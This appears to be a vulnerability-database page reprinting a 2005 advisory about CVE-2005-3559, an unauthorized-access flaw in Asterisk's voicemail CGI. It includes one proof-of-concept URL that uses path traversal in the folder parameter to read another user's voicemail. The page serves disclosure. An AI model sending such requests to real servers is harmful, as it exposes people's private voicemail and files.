Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2005-3559

Publish Date: 07 Nov 2005

                							

                source: http://www.securityfocus.com/bid/15336/info

Asterisk is prone to an unauthorized-access vulnerability. This issue is due to a failure in the application to properly verify user-supplied input.

Successful exploitation will grant an attacker access to a victim user's voicemail and to any '.wav/.WAV' files currently on the affected system. 

http://www.example.org/cgi-bin/vmail.cgi?action=audio&amp;folder=../201/INBOX&amp;mailbox=200&amp;context=default&amp;password=12345&amp;msgid=0001&amp;format=wav

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Asterisk 0.x/1.0/1.2 Voicemail - Unauthorized Access

Vulmon Search

About

Products

Connect